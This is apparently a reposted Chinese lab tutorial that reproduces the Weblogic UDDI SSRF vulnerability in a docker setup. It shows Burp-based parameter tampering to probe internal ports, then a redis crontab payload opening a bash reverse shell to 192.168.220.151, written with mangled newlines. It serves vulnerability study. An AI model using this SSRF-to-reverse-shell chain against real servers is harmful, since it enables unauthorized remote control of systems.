如何实现Weblogic SSRF漏洞复现

亿速云 • 2022年9月24日上午12:17 • 其他 • 阅读 663

一、使用docker搭建环境

docker安装及搭建环境教程：https://www.freebuf.com/sectool/252257.html

访问7001端口

二、漏洞复现步骤

1、漏洞存在页面 /uddiexplorer/SearchPublicRegistries.jsp

2、检查一下IBM这个地方看看

发现是个连接，这就可能存在ssrf了

3、使用burp suite抓包，点击Search

4、修改operator参数的连接

5、访问结果

访问不存在的端口返回 could not connect over HTTP

访问存在的端口返回状态码

访问内网

利用redis反弹shell的payload

set 1 "nnnn* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1nnnn"config set dir /etc/config set dbfilename crontabsave

看完上述内容，你们对如何实现Weblogic SSRF漏洞复现有进一步的了解吗？如果还想了解更多知识或者相关内容，请关注亿速云行业资讯频道，感谢大家的支持。

文章标题：如何实现Weblogic SSRF漏洞复现，发布者：亿速云，转载请注明出处：https://worktile.com/kb/p/29260

ssrf weblogic 复现如何漏洞亿速云

打赏

微信扫一扫

支付宝扫一扫

亿速云认证作者

0 0

SpringBoot怎么搭建Dubbo项目实现斐波那契第n项

上一篇 2022年9月24日上午12:16

win7如何清理c盘垃圾不影响系统

下一篇 2022年9月24日上午12:18

其他

windows 0xc0000221如何解决

解决方法：方法一： 1、首先我们将系统光盘插入到电脑中，在bios设置中选择光盘启动。 2、然后跟着提示，连续选择“下一步” 3、进入安装界面后，点击其中的“修复计算机”就可以引导修复了。方法二： 1、没有光盘也没有关系，只要准备一块系统u盘就可以了。 2、我们还需要另一台使用相同系统的电脑，将…

亿速云
2022年9月16日
840000
其他

mysql查询慢的因素有哪些

数据库查询流程我们先来看下，一条查询语句下来，会经历哪些流程。比如我们有一张数据库表 CREATE TABLE `user` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT ‘主键’, `name` varchar(100) NOT…

亿速云
2022年9月2日
638000
其他

升级服务器什么意思

升级服务器通常意味着1、提高硬件性能、2、更新软件和操作系统、3、扩展存储容量、4、增强安全功能。提高硬件性能包括增加处理器的核心数、频率或升级到更高效的型号，以便应对增长的数据处理需求。此外，增加内存可以显著提升多任务处理和大型应用程序的运行效率。提升内存通常是应对性能瓶颈的首要解决方案，因为它直…

worktile
2024年4月23日
46000
其他

windows会声会影如何保存视频

会声会影保存视频的方法 1、首先我们点击上方的“分享”按钮。 2、然后就可以选择我们需要保存的视频格式了。 3、我们还可以勾选“与项目设置相同”，这样就能直接保存和原视频一模一样的格式。 4、然后在下方设置文件名，点击右边文件夹图标设置保存位置，再点击“开始”。 5、最后只要等待视频成功保存就可以了…

亿速云
2022年9月15日
396000
其他

HTML的p标签可不可以不用align

HTML中的p标签可以不用align属性；因为该属性在“HTML 4.01”中已经被废弃，在HTML5中已经不支持该属性了，可以使用css进行替代该属性，该属性用于规定段落中文本的对齐方式。本教程操作环境：windows10系统、HTML5版本、Dell G3电脑。 HTML的p标签可以不用ali…

亿速云
2022年9月2日
562000
其他

windows会声会影导出视频mp4格式的方法

会声会影导出视频mp4格式的方法 1、首先点击上方的“共享”。 2、点击右侧的“MPE4”。 3、我们可以在配置文件中更改视频具体参数。 4、然后修改文件名和渲染解码方式。 5、最后点击右边的文件夹选择保存路径，点击“开始”开始导出。 6、等待渲染完成导出视频就可以了。以上就是关于“windows…

亿速云
2022年9月15日
635000
其他

云服务器存储资料是什么

摘要云服务器存储资料是1、通过网络访问的远程服务器上存储的数据，其依赖于2、云计算技术，使得数据存取更加灵活和高效。在这两点中，通过网络访问的远程服务器存储意味着用户无需对物理硬件进行管理或投入高额的初期成本，而是通过互联网连接到远程数据中心，实现数据存储和管理。这种模式不仅降低了企业或个人的技术…

不及物动词
2024年4月25日
22000
其他

ppt首行缩进怎么设置

ppt首行缩进设置方法： 1、首先打开幻灯片文件，选择上面的“插入”。 2、之后去找到中间的“文本框设置”。 3、然后建立一些内容。 4、打开“段落样式”点击打开“属性设置”。 5、在段落下面的“缩进”中点击“特殊格式”选择“首行缩进”即可。以上就是关于“ppt首行缩进怎么设置”这篇文章的内容，相…

亿速云
2022年8月31日
1.1K000
其他

word字体放大快捷键是什么

word字体放大快捷键 1、我们只要先按住键盘左下角的“ ctrl ”键。 2、接着按下大键盘右上角的“ 】 ”按键。 3、连续点击，就可以将word文档字体无限放大了。 4、同理，按住“ ctrl ”再点击“ 【 ”就能无限缩小字体。到此，关于“word字体放大快捷键是什么”的学习就结束了，希…

亿速云
2022年9月18日
1.2K000
其他

如何分析绕过Tumblr用户注册过程中的reCAPTCHA验证

今天就跟大家聊聊有关如何分析绕过Tumblr用户注册过程中的reCAPTCHA验证，可能很多人都不太了解，为了让大家更加了解，小编给大家总结了以下内容，希望大家根据这篇文章可以有所收获。大家好，下面分享的writeup是作者通过在Tumblr用户注册过程中，发现Tumblr的“人机身份验证”机制（…

亿速云
2022年9月15日
917000